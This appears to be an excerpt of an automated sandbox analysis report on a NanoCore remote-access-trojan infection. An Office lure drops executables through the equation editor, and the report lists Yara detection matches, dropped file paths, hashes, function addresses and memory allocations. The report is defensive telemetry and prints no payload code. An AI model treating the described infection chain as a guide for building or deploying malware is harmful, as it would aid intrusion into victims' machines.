Source: Yara match	File source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.a30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegSvcs.exe.247e010.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegSvcs.exe.26b4de0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Screenshot number: 4

Screenshot OCR: enable Editing and Content from the Yellow bar 18 above to view locked content. 19 20 21 22

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\asdERTYgh56F[1].exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027626D	4_2_0027626D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002683C0	4_2_002683C0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0028C0B0	4_2_0028C0B0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002630FC	4_2_002630FC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00280113	4_2_00280113
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027F3CA	4_2_0027F3CA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002733D3	4_2_002733D3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026E510	4_2_0026E510
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00280548	4_2_00280548
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0028C55E	4_2_0028C55E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026F5C5	4_2_0026F5C5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027364E	4_2_0027364E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00290654	4_2_00290654
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002766A2	4_2_002766A2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00262692	4_2_00262692
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027589E	4_2_0027589E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027F8C6	4_2_0027F8C6
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026E973	4_2_0026E973
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027397F	4_2_0027397F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026BAD1	4_2_0026BAD1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026DADD	4_2_0026DADD
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00283CBA	4_2_00283CBA
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027FCDE	4_2_0027FCDE
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00276CDB	4_2_00276CDB
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00265D7E	4_2_00265D7E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00263EAD	4_2_00263EAD
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00283EE9	4_2_00283EE9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0026DF12	4_2_0026DF12
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FB35F0	5_2_00FB35F0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FB98F0	5_2_00FB98F0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC2136	5_2_00FC2136
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FCA137	5_2_00FCA137
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FD427D	5_2_00FD427D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFF3A6	5_2_00FFF3A6
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FB98F0	5_2_00FB98F0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FF655F	5_2_00FF655F
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC2508	5_2_00FC2508
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FBF730	5_2_00FBF730
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC3721	5_2_00FC3721
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC28F0	5_2_00FC28F0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FCC8CE	5_2_00FCC8CE
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FD088F	5_2_00FD088F
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC1903	5_2_00FC1903
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFEAD5	5_2_00FFEAD5
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0102EA2B	5_2_0102EA2B
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FD3BA1	5_2_00FD3BA1
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FD0DE0	5_2_00FD0DE0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC1D98	5_2_00FC1D98
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FF2D2D	5_2_00FF2D2D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FF4EB7	5_2_00FF4EB7
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FFCE8D	5_2_00FFCE8D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FD1F2C	5_2_00FD1F2C
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_009243A0	6_2_009243A0
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_0092B310	6_2_0092B310
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_0092DEB8	6_2_0092DEB8
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_00923788	6_2_00923788
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_0092BF28	6_2_0092BF28
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_0092C800	6_2_0092C800
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_00924458	6_2_00924458
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 6_2_0092BFE6	6_2_0092BFE6
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 13_2_00933788	13_2_00933788
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 13_2_009343A0	13_2_009343A0
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Code function: 13_2_00934458	13_2_00934458

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FF6219 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

5_2_00FF6219

Source: mmuiqlcvwo.pif.4.dr

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: C:\Users\Public\vbc.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: <pi-ms-win-core-synch-l1-2-0.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: <pi-ms-win-core-localization-l1-2-1.dll	Jump to behavior
Source: C:\Users\Public\vbc.exe	Section loaded: ext-ms-win-kernel32-package-current-l1-1-0.dll	Jump to behavior

Source: Joe Sandbox View

Dropped File: C:\Users\user\33920049\mmuiqlcvwo.pif C9A2399CC1CE6F71DB9DA2F16E6C025BF6CB0F4345B427F21449CF927D627A40

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
